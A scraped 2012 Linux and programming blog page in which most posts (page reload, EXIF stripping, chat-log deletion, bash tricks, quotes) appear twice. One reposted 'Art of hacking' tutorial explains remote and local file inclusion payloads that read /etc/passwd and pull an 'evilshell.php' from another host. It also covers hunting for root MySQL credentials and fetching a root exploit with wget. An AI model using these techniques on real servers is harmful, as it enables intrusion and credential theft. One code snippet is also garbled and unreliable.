Wednesday 29 February 2012
Tuesday 28 February 2012
Reloading The Page Using Javascript
If you wish to put a nice little Reload this page link in your page, the javascript provides a reload() method that you can use for reloading the page.
The reload() method in window.location can be used to reload the page and works well in most of the browsers. An example snippet is shown below:
I hope this comes useful sometimes.
Read more...
The reload() method in window.location can be used to reload the page and works well in most of the browsers. An example snippet is shown below:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Reload example</title> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <meta name="generator" content="Geany 0.20" /> </head> <body> <iframe height="300" width="300" src="http://wwwindow.location.reload(true)w.google.com"></iframe> <a href="javascript:window.location.reload(true);">Reload this page</a>. </body> </html>
I hope this comes useful sometimes.
Read more...
Bookmark this post: | 
|
List of Hashing Algorithms Used In Major CMS & Forums
Just found this random image from one digital friend and its a pretty good list of hashing algorithms used in many web based applications such as CMS and forum softwares. Some of these algorithms might get outdated with newer versions, but still it will be a good reference.
View Full Size Image
Note for creator: If you are the owner of this image, please let me know so that I can give you the credit.
Read more...
View Full Size Image
Note for creator: If you are the owner of this image, please let me know so that I can give you the credit.
Read more...
Bookmark this post: |
|
Tuesday 21 February 2012
Remove EXIF Data From Pictures Using Linux Terminal [How To]
Exchangeable image file format (Exif) is a standard that specifies the formats for images, sound, and ancillary tags used by digital cameras (including smartphones), scanners and other systems handling image and sound files recorded by digital cameras.
Taken from wikipedia, above information says basically what the EXIF data is. Such EXIF data are usually found in JPEG and TIFF images and much deeper information is given by wikipedia. Now that you understand what EXIF data is, we will now see how we can remove EXIF data.
We like to remove the EXIF data to hide what the picture was build or taken with. For example, a photographer would like to remove the EXIF data after doing some photoshop stuffs on the image so that high-tech people would not find any EXIF presence of photoshop. (This is just an example).
The tool we will be using to remove EXIF data is not other than a part of ImageMagick package, mogrify. So we will use the mogrify command to remove or strip out the EXIF data from the image and then we will see how we can strip EXIF data from multiple files at once.
To strip EXIF from an image, type the following command:
Now, to strip EXIF from folder containing several images, type the following command:
Or use the for loop as below:
I hope this helps you. :)
Read more...
Taken from wikipedia, above information says basically what the EXIF data is. Such EXIF data are usually found in JPEG and TIFF images and much deeper information is given by wikipedia. Now that you understand what EXIF data is, we will now see how we can remove EXIF data.
We like to remove the EXIF data to hide what the picture was build or taken with. For example, a photographer would like to remove the EXIF data after doing some photoshop stuffs on the image so that high-tech people would not find any EXIF presence of photoshop. (This is just an example).
The tool we will be using to remove EXIF data is not other than a part of ImageMagick package, mogrify. So we will use the mogrify command to remove or strip out the EXIF data from the image and then we will see how we can strip EXIF data from multiple files at once.
To strip EXIF from an image, type the following command:
mogrify -strip IMAGE_NAME.JPG
Now, to strip EXIF from folder containing several images, type the following command:
find ~/Desktop/test/ -name '*.jpg' | xargs mogrify -strip
Or use the for loop as below:
for i in ~/Desktop/test/*.JPG; do mogrify -strip $i; done
I hope this helps you. :)
Read more...
Bookmark this post: |
|
Sunday 19 February 2012
Delete All X-Chat Logs From Ubuntu
If you want to clear all the channel and personal chat logs from the X-Chat, this is a small piece of information on how to do that. In this example, I am showing how to delete the X-chat log in ubuntu and similar distributions.
Well I connect to IRC channels so often using X-chat gnome client that my chat windows are usually filled up with older chats. Also, for some unknown reason, unchecking Log Conversations checkbox in the Edit - Preferences is not working for me. And I usually hate the old chat logs coming up and of course, due to privacy concerns, I regularly delete the channel logs of X-Chat. All the chat logs in x-chat2 are recorded in the ~/.xchat2/scrollback/ folder with network names as the sub folders. So to delete the logs, all you have to do is use the rm command as below:
This will delete all the chat logs but in case you want to delete logs of specific networks or channel or user, just navigate to the scrollback directory and choose the network you wish to delete and issue the rm command for that network.
*Note: This little FYI guide was written by taking the version I've as the reference. Your version could even have the option for clearing the logs but I'm not aware of any such functionality in my version. I hope this helps :)
Read more...
Well I connect to IRC channels so often using X-chat gnome client that my chat windows are usually filled up with older chats. Also, for some unknown reason, unchecking Log Conversations checkbox in the Edit - Preferences is not working for me. And I usually hate the old chat logs coming up and of course, due to privacy concerns, I regularly delete the channel logs of X-Chat. All the chat logs in x-chat2 are recorded in the ~/.xchat2/scrollback/ folder with network names as the sub folders. So to delete the logs, all you have to do is use the rm command as below:
rm -rf ~/.xchat2/scrollback/*
This will delete all the chat logs but in case you want to delete logs of specific networks or channel or user, just navigate to the scrollback directory and choose the network you wish to delete and issue the rm command for that network.
*Note: This little FYI guide was written by taking the version I've as the reference. Your version could even have the option for clearing the logs but I'm not aware of any such functionality in my version. I hope this helps :)
Read more...
Bookmark this post: |
|
Friday 17 February 2012
5 Cool and Useful Linux Command Line Tricks
Well using linux is fun and working on linux terminal is even more fun. Learning to use linux terminal and commands can prove very useful for personal as well as enterprise purpose. Today I'm going to talk about few cool and crazy linux commands that are less likely to be known by the average computer user.
1) The !$ trick: The !$ is a type of event designator that is present in bash as the feature. I'm not sure if other shells support it but bash does, for sure(I heard event designators are bash-specific). Anyway, !$ saves the last string from the previous command you've entered. The session in bash below shows what it actually does:
So when we give the mkdir test command, the !$ holds the value test So when we do cd !$, !$ is replaced by the string test which is the last string in last entered command.
2) The Don't Save This Command trick: Prepending your command with one or more space(<space>command) will not save the command in the bash history. This trick can be quite useful while doing password related stuffs and while sneaking in your friend's laptop.
3) The Oh! I forgot sudo trick: Well this is one of my favorite tricks and I named it so because I tend to forget to put sudo while running many commands and then I use this trick to prepend sudo at the beginning of the command. Below is the session when I used this trick recently.
As shown above, the !! is just another event designator. The !! actually holds the last used command and this can be alternatively specified as !-1. The !-1 version can be actually generalized to traverse back to history i.e. you can get any command in your history by using !-n convention.
4) The Clean up Terminal trick: Sometimes you open the binary and gibberish data and your terminal looks so ugly and needs some cleanup. In such cases, the command reset can be used which actually does is initialize the terminal.
5) Run previous command by replacing one string with another: Using the syntax ^abc^xyz^, you can run the previous command by replacing the string abc by the string xyz. The example below shows how I used the cat command after using the ls command. Its just an example, you could really make use of this trick for longer commands.
Read more...
1) The !$ trick: The !$ is a type of event designator that is present in bash as the feature. I'm not sure if other shells support it but bash does, for sure(I heard event designators are bash-specific). Anyway, !$ saves the last string from the previous command you've entered. The session in bash below shows what it actually does:
samar@Techgaun:~/Desktop$ mkdir test
samar@Techgaun:~/Desktop$ cd !$
cd test
samar@Techgaun:~/Desktop/test$
samar@Techgaun:~/Desktop$ cd !$
cd test
samar@Techgaun:~/Desktop/test$
So when we give the mkdir test command, the !$ holds the value test So when we do cd !$, !$ is replaced by the string test which is the last string in last entered command.
2) The Don't Save This Command trick: Prepending your command with one or more space(<space>command) will not save the command in the bash history. This trick can be quite useful while doing password related stuffs and while sneaking in your friend's laptop.
3) The Oh! I forgot sudo trick: Well this is one of my favorite tricks and I named it so because I tend to forget to put sudo while running many commands and then I use this trick to prepend sudo at the beginning of the command. Below is the session when I used this trick recently.
samar@Techgaun:~$ cat /etc/sudoers
cat: /etc/sudoers: Permission denied
samar@Techgaun:~$ sudo !!
sudo cat /etc/sudoers
[sudo] password for samar:
*** Content Snipped to preserve length ***
cat: /etc/sudoers: Permission denied
samar@Techgaun:~$ sudo !!
sudo cat /etc/sudoers
[sudo] password for samar:
*** Content Snipped to preserve length ***
As shown above, the !! is just another event designator. The !! actually holds the last used command and this can be alternatively specified as !-1. The !-1 version can be actually generalized to traverse back to history i.e. you can get any command in your history by using !-n convention.
4) The Clean up Terminal trick: Sometimes you open the binary and gibberish data and your terminal looks so ugly and needs some cleanup. In such cases, the command reset can be used which actually does is initialize the terminal.
5) Run previous command by replacing one string with another: Using the syntax ^abc^xyz^, you can run the previous command by replacing the string abc by the string xyz. The example below shows how I used the cat command after using the ls command. Its just an example, you could really make use of this trick for longer commands.
samar@Techgaun:~/Desktop$ ls /etc/hosts
/etc/hosts
samar@Techgaun:~/Desktop$ ^ls^cat^
cat /etc/hosts
/etc/hosts
samar@Techgaun:~/Desktop$ ^ls^cat^
cat /etc/hosts
Read more...
Bookmark this post: |
|
Thursday 16 February 2012
Art of hacking 4 - spyd3rm4n's guide to hacking
Well this is the part 4 of the art of hacking series I've been posting here. Since the original site dmz has been down since long time, I have been uploading these tutorials. This part of tutorial explains what a PHP shell is and how you can use the php shell to gain the root access in the servers.
[0x01] PHP_Shell - what it is
[0x02] Root
[0x03] Obtaining_Root
Sub PHP_Shell{
What is a PHP Shell you may ask yourself. A PHP Shell is exactly what it says. It is a shell written in PHP that is used to emulate console and contains automated scripts to help you do whatever it is that you need. My favorite shell is the x2300, although it is hard to come by.
}
Sub Root{
root is the user on a nix based OS that has all privileges to do anything wished. Obtaining it through a PHP Shell can be a long and frustrating process.
The first thing that needs to be done, is the get a PHP Shell on the system. This can be done through and RFI (Remote File Inclusion) vulnerability.
Example: http://site.com/index.php?page=about.php
You can use this as an LFI (Local File Inclusion) and RFI.
This will show the passwd on the linux box. Giving you directory listing for every user on it.
This will include the evilshell.php located at anothersite.com
Looking for a vulnerability in a script:
The easiest way to find an LFI/RFI is to look for something like
include();
@include();
as long as the include() function includes user input, like
This is the GET method, $page is assigned to the value of page. http://site.com/index.php?page=
@include($page);
^ Jackpot.
Once the shell is on the site, you can look around for anything useful on the box that can be used to obtain root. I suggest looking for config files that contain mysql information. If you find the resellers config or global.inc file and it contains root mysql information, you can use this to look through the mysql database for any software that requires root input.
Example:
Lets say for the sake of this tutorial, I have software on my computer that requires root to run. So I have to give it the root user and password. This is stored in the mysql database. Once someone is in the mysql database and finds the information for that software, they will see the root user and pw for the box.
That is one of the most common ways of obtaining root through research. One thing to note, is that hosting companies often forget to assign a password for root mysql. So if you have a PHP Shell, try connecting to the SQL Database using the user root and no password. Funny how there is no fix for human error.
Another way to obtain root is through an overflow. You can get these root shells, usually scripts that will exploit and overflow a process running as root to spill out/change/grant a user root privileges.
Example:
There is a process running as root, this process is a result of the program called shell_av (Shell AntiVirus)
Now, lets say I know a local root overflow exploit for shell_av. I will create a script using shell code (which will be covered in the mini-book stack/buffer overflows) in C that will overflow this app and use the PHP Shell to wget it from a remote server so I don't have to type it all up in that little cmd box.
Once executed the cmd box will output the information for that overflow. Let's say that the overflow only granted the user that the shell is on root priviledges.
(The PHP Shell is located on in the directory of /home/bob/public_html/ - bob is the user)
This would grant bob root privileges. Now all you have to do is get bob's password and login SSH, and you have complete control of the box.
}
- Credits : Kr3w of TheDefaced.
Read more...
[0x01] PHP_Shell - what it is
[0x02] Root
[0x03] Obtaining_Root
Sub PHP_Shell{
What is a PHP Shell you may ask yourself. A PHP Shell is exactly what it says. It is a shell written in PHP that is used to emulate console and contains automated scripts to help you do whatever it is that you need. My favorite shell is the x2300, although it is hard to come by.
}
Sub Root{
root is the user on a nix based OS that has all privileges to do anything wished. Obtaining it through a PHP Shell can be a long and frustrating process.
The first thing that needs to be done, is the get a PHP Shell on the system. This can be done through and RFI (Remote File Inclusion) vulnerability.
Example: http://site.com/index.php?page=about.php
You can use this as an LFI (Local File Inclusion) and RFI.
http://site.com/index.php?page=../../../../../etc/passwd
This will show the passwd on the linux box. Giving you directory listing for every user on it.
http://site.com/index.php?page=http://anothersite.com/evilshell.php
This will include the evilshell.php located at anothersite.com
Looking for a vulnerability in a script:
The easiest way to find an LFI/RFI is to look for something like
include();
@include();
as long as the include() function includes user input, like
$page = $_GET['page'];
This is the GET method, $page is assigned to the value of page. http://site.com/index.php?page=
@include($page);
^ Jackpot.
Once the shell is on the site, you can look around for anything useful on the box that can be used to obtain root. I suggest looking for config files that contain mysql information. If you find the resellers config or global.inc file and it contains root mysql information, you can use this to look through the mysql database for any software that requires root input.
Example:
Lets say for the sake of this tutorial, I have software on my computer that requires root to run. So I have to give it the root user and password. This is stored in the mysql database. Once someone is in the mysql database and finds the information for that software, they will see the root user and pw for the box.
That is one of the most common ways of obtaining root through research. One thing to note, is that hosting companies often forget to assign a password for root mysql. So if you have a PHP Shell, try connecting to the SQL Database using the user root and no password. Funny how there is no fix for human error.
Another way to obtain root is through an overflow. You can get these root shells, usually scripts that will exploit and overflow a process running as root to spill out/change/grant a user root privileges.
Example:
There is a process running as root, this process is a result of the program called shell_av (Shell AntiVirus)
Now, lets say I know a local root overflow exploit for shell_av. I will create a script using shell code (which will be covered in the mini-book stack/buffer overflows) in C that will overflow this app and use the PHP Shell to wget it from a remote server so I don't have to type it all up in that little cmd box.
Once executed the cmd box will output the information for that overflow. Let's say that the overflow only granted the user that the shell is on root priviledges.
(The PHP Shell is located on in the directory of /home/bob/public_html/ - bob is the user)
This would grant bob root privileges. Now all you have to do is get bob's password and login SSH, and you have complete control of the box.
}
- Credits : Kr3w of TheDefaced.
Read more...
Bookmark this post: |
|
Wednesday 15 February 2012
Best Programming and Computer Quotes and Sayings
Few weeks ago, I was tweeting a lot of programming quotes and sayings I was reading elsewhere in different websites. I thought why not post all those fantastic cool and funny quotes about computer and programming here so here comes this new blog post. Come and read this quotes once you have finished the overloaded tiresome session of writing technologies :D.
Please contribute some you know or you've heard recently :D
Read more...
Open source is not communism because it does not force people. --Eric S Raymond in Revolution OS
Wozniak designed Apple II. Ken designed Lisa. Jef Raskin designed Macintosh. Sanders designed Apple III. What did Jobs design? Nothing.
Real programmers don't code in BASIC. Actually, no programmers code in BASIC after reaching puberty.
Saying that Java is nice because it works on all OSs is like saying that anal sex is nice because it works on all genders.
"I won't program in java anymore. I'm not Marxist and don't believe in classes." --phluid
Knowing what not to use is far better than knowing what to use in programming languages.
A professional programmer is an amateur who never quits. --Morendil
“If debugging is the process of removing software bugs, then programming must be the process of putting them in.” – E. Dijkstra
Any fool can write code that a computer can understand. Good programmers write code that humans can understand. -Martin Fowler
One man’s crappy software is another man’s full time job.
The best thing about a boolean is: even if you are wrong, you are only off by a bit.
A documented bug is not a bug; it is a feature.
C++, where friends can access your privates.
"It's hard enough to find an error in your code when you're looking for it; it's even harder when you've assumed your code is error-free." - Steve McConnell
"The first 90% of the code accounts for the first 90% of the development time. The remaining 10% of the code accounts for the other 90% of the development time." - Tom Cargill
"Most software today is very much like an Egyptian pyramid with millions of bricks piled on top of each other, with no structural integrity, but just done by brute force and thousands of slaves." - Alan Kay
Amazon became no.1 shopping site coz in the days b4 search giant Google existed,Yahoo would list the sites in their directory alphabetically
"I’ve finally learned what ‘upward compatible’ means. It means we get to keep all our old mistakes."
There are two ways of constructing a software design. One way is to make it so simple that there are obviously no deficiencies. And the other way is to make it so complicated that there are no obvious deficiencies.
There are only two kinds of programming languages: those people always bitch about and those nobody uses.
Windows NT addresses 2 Gigabytes of RAM, which is more than any application will ever need. --Microsoft Corporation in 1992 :D
Please contribute some you know or you've heard recently :D
Read more...
Bookmark this post: |
|
Subscribe to:
Posts (Atom)